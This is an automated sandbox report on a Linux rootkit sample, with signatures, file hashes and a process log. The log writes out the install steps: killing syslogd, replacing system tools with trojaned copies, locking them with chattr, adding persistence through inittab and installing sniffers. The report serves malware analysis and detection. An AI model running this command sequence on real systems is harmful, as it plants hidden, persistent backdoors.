Analysis Overview
SHA256
c7d3a16ba29abcf5261b66af753f44124fcb3a303059f7cee04334983a3b6d16
Threat Level: Shows suspicious behavior
The file 4bd599176fbaab489642f3fafb083862_JaffaCakes118 was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Enumerates running processes
Write file to user bin folder
Attempts to change immutable files
Checks CPU configuration
Reads CPU attributes
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-15 23:17
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-15 23:17
Reported
2024-07-15 23:19
Platform
debian9-armhf-20240611-en
Max time kernel
24s
Max time network
25s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /usr/sbin/ttyload | /usr/sbin/ttyload | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/hostname | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Enumerates running processes
Write file to user bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /usr/sbin/ttyload | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/26/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/41/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/274/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/28/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/19/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/148/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/633/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/587/stat | /bin/pidof | N/A |
| File opened for reading | /proc/625/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/16/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/109/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/162/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/139/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/76/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/303/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/587/status | /bin/ps | N/A |
| File opened for reading | /proc/303/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/633/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/28/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/23/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/299/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/136/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/277/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/275/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/588/stat | /bin/ps | N/A |
| File opened for reading | /proc/98/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/139/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/633/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/587/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/22/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/633/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/588/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/635/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/274/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/25/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/43/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/22/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/585/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/109/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/762/stat | /bin/pidof | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/109/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/148/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/140/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/278/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/630/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/314/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/18/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/633/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/23/status | /bin/ps | N/A |
| File opened for reading | /proc/635/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/98/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/killall | N/A |
| File opened for reading | /proc/274/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/24/stat | /bin/pidof | N/A |
| File opened for reading | /proc/633/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/26/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/136/stat | /usr/bin/killall | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/conf/hosts.h | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init1 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init2 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.shmd5 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.procs | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.stats | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/info_tmp | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/bin/.sh/sshd_config | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Processes
/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118
[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]
/usr/bin/whoami
[whoami]
/bin/tar
[tar zxf ./bin.tgz]
/bin/tar
[tar zxf ./conf.tgz]
/bin/tar
[tar zxf ./lib.tgz]
/bin/tar
[tar zxf ./utilz.tgz]
/bin/tar
[tar zxf ./sshd.tgz]
/bin/rm
[rm -rf ./sshd.tgz]
/bin/rm
[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]
/bin/sleep
[sleep 2]
/usr/bin/killall
[killall -9 syslogd]
/bin/date
[date +%S]
/bin/sleep
[sleep 2]
/bin/hostname
[hostname -f]
/bin/grep
[grep -v ^# /etc/syslog.conf]
/bin/grep
[grep -v ^$]
/bin/grep
[grep @]
/usr/bin/cut
[cut -d @ -f 2]
/bin/uname
[uname -n]
/bin/mv
[mv lib/libproc.a /lib/]
/bin/mv
[mv lib/libproc.so.2.0.6 /lib/]
/sbin/ldconfig
[/sbin/ldconfig]
/usr/bin/md5sum
[md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /etc/sh.conf]
/bin/chown
[chown -f root:root /etc/sh.conf]
/usr/bin/chattr
[chattr +isa /etc/sh.conf]
/bin/rm
[rm -rf /tmp/bin/.sh/shdcf2]
/bin/mv
[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]
/bin/mv
[mv /tmp/conf/lidps1.so /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/conf/*]
/bin/mv
[mv /tmp/conf/* /usr/include/]
/bin/mkdir
[mkdir /lib/libsh.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/libsh.so]
/bin/mkdir
[mkdir /usr/lib/libsh]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh]
/bin/mv
[mv .sh/* /lib/libsh.so/]
/bin/mv
[mv .sh/.bashrc /usr/lib/libsh]
/bin/mv
[mv /lib/libsh.so/sshd /sbin/ttyload]
/bin/chmod
[chmod a+xr /sbin/ttyload]
/bin/chmod
[chmod o-w /sbin/ttyload]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttyload]
/usr/bin/chattr
[chattr +isa /sbin/ttyload]
/bin/pidof
[pidof ttyload]
/bin/mv
[mv /tmp/bin/ttymon /sbin/ttymon]
/bin/chmod
[chmod a+xr /sbin/ttymon]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttymon]
/usr/bin/chattr
[chattr +isa /sbin/ttymon]
/bin/pidof
[pidof ttymon]
/bin/cp
[cp /bin/bash /lib/libsh.so]
/usr/bin/chattr
[chattr -isa /etc/inittab]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v ttyload]
/bin/grep
[grep -v getty]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep getty]
/bin/cat
[cat /tmp/.init2]
/usr/bin/touch
[touch -acmr /bin/ls /usr/sbin/ttyload]
/bin/chmod
[chmod +x /usr/sbin/ttyload]
/usr/bin/chattr
[chattr +isa /usr/sbin/ttyload]
/usr/sbin/ttyload
[/usr/sbin/ttyload]
/sbin/ttyload
[/sbin/ttyload -q]
/sbin/ttymon
[/sbin/ttymon]
/usr/bin/touch
[touch -amcr /etc/inittab /tmp/.init1]
/bin/mv
[mv -f /tmp/.init1 /etc/inittab]
/bin/rm
[rm -rf /tmp/.init2]
/bin/grep
[grep ttyload /etc/inittab]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ps]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ls]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/find]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/top]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/md5sum]
/tmp/encrypt
[./encrypt -e .shmd5 /dev/srd0]
/usr/bin/touch
[touch -acmr /bin/ls /dev/srd0]
/usr/bin/chattr
[chattr a+r /dev/srd0]
/bin/chown
[chown -f root:root /dev/srd0]
/bin/rm
[rm -rf .shmd5]
/usr/bin/touch
[touch -acmr /sbin/ifconfig ifconfig]
/usr/bin/touch
[touch -acmr /bin/ps ps]
/usr/bin/touch
[touch -acmr /bin/ls ls]
/usr/bin/touch
[touch -acmr /bin/netstat netstat]
/usr/bin/touch
[touch -acmr /usr/bin/find find]
/usr/bin/touch
[touch -acmr /usr/bin/top top]
/usr/bin/touch
[touch -acmr /usr/sbin/lsof lsof]
/usr/bin/touch
[touch -acmr /sbin/syslogd syslogd]
/usr/bin/touch
[touch -acmr /usr/bin/slocate slocate]
/usr/bin/touch
[touch -acmr /usr/bin/dir dir]
/usr/bin/touch
[touch -acmr /usr/bin/md5sum md5sum]
/usr/bin/touch
[touch -acmr /usr/bin/pstree pstree]
/bin/mkdir
[mkdir /usr/lib/libsh/.backup]
/usr/bin/chattr
[chattr -isa /bin/ps]
/bin/cp
[cp /bin/ps /usr/lib/libsh/.backup]
/bin/mv
[mv -f ps /bin/ps]
/usr/bin/chattr
[chattr +isa /bin/ps]
/usr/bin/chattr
[chattr -isa /sbin/ifconfig]
/bin/cp
[cp /sbin/ifconfig /usr/lib/libsh/.backup]
/bin/mv
[mv -f ifconfig /sbin/ifconfig]
/usr/bin/chattr
[chattr +isa /sbin/ifconfig]
/usr/bin/chattr
[chattr -isa /bin/netstat]
/bin/cp
[cp /bin/netstat /usr/lib/libsh/.backup]
/bin/mv
[mv -f netstat /bin/netstat]
/usr/bin/chattr
[chattr +isa /bin/netstat]
/usr/bin/chattr
[chattr -isa /usr/bin/top]
/bin/cp
[cp /usr/bin/top /usr/lib/libsh/.backup]
/bin/mv
[mv -f top /usr/bin/top]
/usr/bin/chattr
[chattr +isa /usr/bin/top]
/usr/bin/chattr
[chattr -isa /bin/ls]
/bin/cp
[cp /bin/ls /usr/lib/libsh/.backup]
/bin/mv
[mv -f ls /bin/ls]
/usr/bin/chattr
[chattr +isa /bin/ls]
/usr/bin/chattr
[chattr -isa /usr/bin/find]
/bin/cp
[cp /usr/bin/find /usr/lib/libsh/.backup]
/bin/mv
[mv -f find /usr/bin/find]
/usr/bin/chattr
[chattr +isa /usr/bin/find]
/usr/bin/chattr
[chattr -isa /usr/bin/pstree]
/bin/cp
[cp /usr/bin/pstree /usr/lib/libsh/.backup]
/bin/mv
[mv -f pstree /usr/bin/pstree]
/usr/bin/chattr
[chattr +isa /usr/bin/pstree]
/usr/bin/chattr
[chattr -isa /usr/bin/md5sum]
/bin/cp
[cp /usr/bin/md5sum /usr/lib/libsh/.backup]
/bin/mv
[mv -f md5sum /usr/bin/md5sum]
/usr/bin/chattr
[chattr +isa /usr/bin/md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz/*]
/bin/mv
[mv /tmp/utilz /usr/lib/libsh/]
/bin/mkdir
[mkdir /usr/lib/libsh/.sniff]
/bin/mv
[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]
/bin/mv
[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]
/bin/mv
[mv /tmp/bin/shsb /usr/lib/libsh/shsb]
/bin/mv
[mv /tmp/bin/hide /usr/lib/libsh/hide]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/shsb]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/hide]
/bin/chmod
[chmod +x /usr/lib/libsh/.sniff/*]
/bin/chmod
[chmod +x /usr/lib/libsh/shsb]
/bin/chmod
[chmod +x /usr/lib/libsh/hide]
/bin/ps
[ps aux]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep named]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep smbd]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep rpc.statd]
/bin/rm
[rm -rf /tmp/.procs]
/bin/cat
[cat /tmp/.stats]
/bin/grep
[grep 443]
/bin/grep
[grep http]
/bin/rm
[rm -rf /tmp/.stats]
/bin/mkdir
[mkdir /usr/lib/libsh/.owned]
/usr/bin/chattr
[chattr +isa /usr/lib/libsh]
/usr/bin/chattr
[chattr +isa /lib/libsh.so]
/usr/bin/killall
[killall -9 -q nscd]
/usr/bin/killall
[killall -9 -q xntps]
/usr/bin/killall
[killall -9 -q mountd]
/usr/bin/killall
[killall -9 -q mserv]
/usr/bin/killall
[killall -9 -q psybnc]
/usr/bin/killall
[killall -9 -q t0rns]
/usr/bin/killall
[killall -9 -q linsniffer]
/usr/bin/killall
[killall -9 -q sniffer]
/usr/bin/killall
[killall -9 -q lpsched]
/usr/bin/killall
[killall -9 -q sniff]
/usr/bin/killall
[killall -9 -q sn1f]
/usr/bin/killall
[killall -9 -q sshd2]
/usr/bin/killall
[killall -9 -q xsf]
/usr/bin/killall
[killall -9 -q xchk]
/usr/bin/killall
[killall -9 -q ssh2d]
/sbin/ifconfig
[/sbin/ifconfig eth0]
/bin/grep
[grep inet addr:]
/usr/bin/awk
[awk -F {print $2} ]
/usr/bin/cut
[cut -c6-]
/bin/hostname
[hostname -f]
/bin/uname
[uname -a]
/usr/bin/awk
[awk { print $11 }]
/bin/cat
[cat /tmp/info_tmp]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep bogomips]
/usr/bin/awk
[awk {print $3}]
/bin/hostname
[hostname -i]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep eth]
/usr/bin/wc
[wc -l]
/usr/bin/head
[head -1 /etc/debian_version]
/bin/rm
[rm -rf /tmp/info_tmp]
/bin/date
[date +%S]
/usr/bin/expr
[expr 33 - 13]
/sbin/iptables
[/sbin/iptables -L input]
/usr/bin/head
[head -5]
/sbin/syslogd
[/sbin/syslogd -m 0]
/bin/rm
[rm -rf ../shv5*]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-0 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-0 | udp |
| US | 1.1.1.1:53 | debian9-armhf-20240611-en-0 | udp |
Files
/var/cache/ldconfig/aux-cache~
| MD5 | a6bf94354cfeba3dbcd11f945c9675c4 |
| SHA1 | a27339c994e7b65ef52ae9dc38a625b8d2241bf6 |
| SHA256 | 13eaf12dd225106747bd57c2bdc230e109038d83a2feaff34ab1148dbf9d9c28 |
| SHA512 | 0e495be99718139c7a8bde0b4f73fb995465c31d74ecc6ec696d7e8e17f0f6767950f94e6d5962e1541902ef93b6c35e4d90bdae38eb13327f1dfb830188a1e7 |
/lib/libsh.so/bash
| MD5 | c119e30e6cf65d40abec2ebdc4f1e9cb |
| SHA1 | 67fd5fdf3161a0c086932074844a8bbf444b8911 |
| SHA256 | 6b66d1462c569b1fd6de35d4a4efc7dfbd8bfe59a20c9a17b506ac468abf098b |
| SHA512 | 2d8e1a6820e206e43c0449bbe4b613d19d63853270b3d0bdc5be12d4bcab89dcd4f5def8a81126d51984a9e8169526d1b44996a2c0a18bfb1d764040c865fe89 |
/tmp/.init1
| MD5 | ba6ed6a3d425270d5374b0c2b54b3008 |
| SHA1 | 58635a2e5fa938e55f777cb55a6df5fe44f6b4ec |
| SHA256 | 91c48fb19d87c95033df44d44e58474ab5e2a7176d231c11bb5e45c7d52fa359 |
| SHA512 | 6f2ecc0fe867ec1cc575dc8cbba8566ac32dea4252b355f4267afb18d15dd759baecac3d8b74656a6008b7d20be3033ee4650f8b9cece8c2eb2466dc6fcecd0c |
/tmp/.init1
| MD5 | 0dae4739f83623a59236ecfabe00007b |
| SHA1 | 4b2b361ba9cf76213d2c4d6ba67e80099405f810 |
| SHA256 | 513dfa0b7341549c6141df2ebdf1eedf72f1904d47725a17213b3bcb80916ac0 |
| SHA512 | 12ab203d1434f29cf4b5f81d72a0790d9ddacd20df5d71e2a0d429b2bc8c80cff5c4a4c1332452deb9d84817088a1223f55ef2411f0605cfbe00eb2fe8aa1d74 |
/tmp/.init1
| MD5 | 21df30feebe94d25ce99e861e3642895 |
| SHA1 | 3624439d7e9ac4463f83f1658205367ef27a2234 |
| SHA256 | d3bfdb3e0f63a093f8e9bff6925ddc52429fe09fe4de521add28b373d44fe0f5 |
| SHA512 | 26fbc52d5c2984a74673397e6edce3bf8a14e4d52a1abc7ffdfbf1bae9768b2583512632625d01bac896c623b0ec10fa24f6aa3c54ec2a70450b02d9bb37cecb |
/tmp/.init1
| MD5 | 74e8461d4c9dd715082f15ef51e3ecac |
| SHA1 | 0504be0510ac79c4f7c8d5477032408f9b63a651 |
| SHA256 | 9fff95a586ab017f278fbf2f579d424e29164b5fae02f509176b9a600c4091de |
| SHA512 | 0682c5966466f49b1f53b872e5f10a4264f11a65f198f8e780365e6c683899815f90613cf8cd900d7b8d47247c343ab6002183a405313ac07fe026a2f634e02c |
/tmp/.init1
| MD5 | 8c053b4b674ebfcf6d38503608c5c8db |
| SHA1 | 9927d232e5bb15e3b6bbe461e0041d74649b963a |
| SHA256 | 6bdd745ccb67873f8e05c871ea6f153bb4daa683d7873e22c93fa716f53f61dc |
| SHA512 | 35320ff6eed384649f02262a46bf9fdabdcf1f9808738b7c6af3fea01a1b54c963d038c984c3d794445030632ab1ae38c8d6bbf319a362233a40ac9314a55222 |
/usr/sbin/ttyload
| MD5 | b46702355aecfc0bd14c525655eccb8b |
| SHA1 | 85ae2258fdf63f04130470356e4d0ba13cce49b4 |
| SHA256 | d4fe551995b5a5c5c71656ad1bf102c790f0a8a8415e1331ee9948e451a23db7 |
| SHA512 | db411c4f553c0eefd8672bf395679d48fe7dd9ad467d2ee5e738dd62815b2091c191c32db87bf88ae1aad3689a020c2e565091e1086f5fd1733c75847091f151 |
/usr/sbin/ttyload
| MD5 | 53e75bf7964b0fb15cbe3028a151ed65 |
| SHA1 | 116589e3b65166f73be2c6e8bb3b09c07641a762 |
| SHA256 | 550618b776401129e1bf6000bc28a7891ab0a6431bac3382be1ee1a585282805 |
| SHA512 | ec2f45bc08e02e16db6db32bb71daff158c4044ed7268b696a62bf0efe9de59c331d6afb0b9101b5686e41cc701c491d75b0617c18bb68fb3393bea2ba702316 |
/tmp/.shmd5
| MD5 | f0a2dccf108969338c829700d2dedbea |
| SHA1 | 8daa48f1b0d9fe0f5204e5fbe53219ec3bd6bfe4 |
| SHA256 | 18883af5bb7d532b29d96a5f574180b69a2e717cec2d9bdb7281121b0c7b88a6 |
| SHA512 | 67ab595bdaa10dc47ea3cb479d3a4741eef538e4088726bb9e64988234d9a5cf9d0df876e1ebbd00fb79615e1aefeb8006bba4026a76e03f75aa5f3039d12f49 |
/tmp/.shmd5
| MD5 | dc1735d96a90ff69ba41bf58c3bc2f39 |
| SHA1 | b5cbca6a62f9acb5c098f8f86a24f91412fa394d |
| SHA256 | 7a8ab94bbac31a0f8ccbb76d7be88081936d23850927e34d75fc0c2e9b7d0f24 |
| SHA512 | b176b66ff17fed27df65261beb14a1539079bf36e8bebcce894852296612088f0bcc69ad6d153936060289a35f3408a65b44578fd62b1da7db724808398ca0f6 |
/tmp/.shmd5
| MD5 | 857c3956d4a1a4582e141faffb4b1779 |
| SHA1 | e8a492beb7474ec753feb22218ec80ef225fba48 |
| SHA256 | 240ff5077cf70e5bdd3db05117b6616220b5fb640204e7f09098ba2533bb71b1 |
| SHA512 | 8dd66b41ae1cf9779ddeac7d6ec965e505632c5d68151a029d349416930953f900959aba8b2f77d4a2477140ed3ec3422c9fa43d164efb12ca6cca465711b2a3 |
/tmp/.shmd5
| MD5 | fa8d0415321078ae192da3f4126ecce8 |
| SHA1 | 75cf9b5aecb0801f6a4d9f5b9a7b8276c6f72cb3 |
| SHA256 | b0a80b13087310fd54ff6ae57345a499cbb2b3fa2b0e6dd0e5cbe5c63bc3b21d |
| SHA512 | 941c83e63e1fbd481a2928a0e1f4e02deec4434989d7b28796203d5417de9a0fe7adee44d857136dbb0961209ef349ad6667600a83a8fc6949dda138aea1cc87 |
/tmp/.shmd5
| MD5 | d1220027882f8ccaf610795654f25b77 |
| SHA1 | e03d19c941c886cfc84e0644acf4ca65647c2b92 |
| SHA256 | 93163ae54ecefea14f7c701c15e9c909582036b8fd8f61a94ff3c91dd90bf0de |
| SHA512 | 3b4cde3abc06e2d571fac45d3f270e944e8ef235e5fa7a8eb7b16163f6c6f9624484e637fe2373d869a553e1c5786dbe8150abc4f317347aa569782d3aef47a4 |
/usr/lib/libsh/.backup/ps
| MD5 | c93283a1ee71686a4c9c1a58495d61aa |
| SHA1 | e3a549212766c446f419cb20b627406a7c9cb372 |
| SHA256 | 5268d4cdcb0b1988dd8e1a549d3f68af322242ed05f0d7d46f263590fe138f95 |
| SHA512 | 0306a45375926837688073f0408e11a9236c143381aa9fd98c998feb523daa1f1f7ca1cb27ac3c62749b53149115315bba3527f06ef873e9416cd7a68537fcf5 |
/usr/lib/libsh/.backup/top
| MD5 | 16f0b6ac13b75fb60b9177800b730cc0 |
| SHA1 | 601e899aa19be08acc6965a17013807465757b9b |
| SHA256 | 55d4baa5703049edd1091ab97e845ffa50af06427480c09637219751ab7517b2 |
| SHA512 | f94d34cf451053146736a13cfb3d1b93ea22660544baa495e828f7d7dc01276bfcff8985cc35035b672655efcbf1607cdcd879ffe4ffe311b406ca22cc70df47 |
/usr/lib/libsh/.backup/ls
| MD5 | fd8041181f67149d6b84bed1401c0f3b |
| SHA1 | 6824b1ee73a9f50a97369a674a009ec687a09cff |
| SHA256 | e83717a87080eae8bd6772e08fe4b83c54cc1c5672cc02edf0e60de227118a95 |
| SHA512 | a58ab85e69dd41f4c8d79c07eede01e240d0201957a96a386a6256a1474852fde4dce850f0237e664812a03801e57a50fa70a4b0da05e6ab65d1fae2e6277a75 |
/usr/lib/libsh/.backup/find
| MD5 | 138a27d6fe52fa1132760a4fa48922e0 |
| SHA1 | e0250e4d7bf33a5a1064344224148b889cb15138 |
| SHA256 | 81a10dad907b23521461bd3fc83c2cedb2218933a328d9a05e3c9f6a9a1d42aa |
| SHA512 | ee0078afad63fc2aaffdebb7127d1c7d4459287fee75358f57c82d397c39b7bf64338fb6996dfb1747cd9a896d714b3c76f0948727be91550f1affa1c0298a9e |
/usr/lib/libsh/.backup/pstree
| MD5 | d326548ef8d6a8cb14b495115c6e9c73 |
| SHA1 | fee8b30669dc67e207bf6fcb2d36838f65a5c69a |
| SHA256 | 8af3af6bf27f219619ca657f86e124fb5ee85d779df8af79a78eaf19a930224b |
| SHA512 | a5b6b1744da59b5531dd644ee318febd7588a7e0e8aa8b4543106ef0b00a4318a8fe2e6bd11c7ca85be61e59c9ff5643067e076ff9af19f4d1c663d7e3408c57 |
/usr/lib/libsh/.backup/md5sum
| MD5 | 8e89133057a1152e19e05fcfd5034aae |
| SHA1 | 94301c22a1137deef4797a26eb04a4f68b814d96 |
| SHA256 | 7eb9347d691bea01ec8fcce0f055d0b94e36a9615bc69c203f764540b32047eb |
| SHA512 | f43d2b23033ff34d6bd9dfcb3a88a45fd59195638961b5192be4fc0d4d8304520e870bea1c9689f1ce1c84506b5e1f296a88961d1c88fca0a62d52cddffb0700 |
/tmp/.procs
| MD5 | aef0778609d12066a26732722ab63f42 |
| SHA1 | f6d97eaa94003ea3f70907c9d4a3fb50ffb57525 |
| SHA256 | eca3253479966699a6377c78df0e2934915e571658fa3b5788230582d9c3d8ae |
| SHA512 | 2925512da6c5728fb73e62d88cc9f8da9377be2d396d69d181e532730f3daebf188cd70818bb27003960e7d26904bec5b18240fde40d711ca89da3650ed8f69e |
/tmp/info_tmp
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-15 23:17
Reported
2024-07-15 23:19
Platform
debian9-mipsbe-20240611-en
Max time kernel
72s
Max time network
73s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /usr/sbin/ttyload | /usr/sbin/ttyload | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/hostname | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Enumerates running processes
Write file to user bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /usr/sbin/ttyload | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/704/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/345/stat | /bin/pidof | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/6/stat | /bin/ps | N/A |
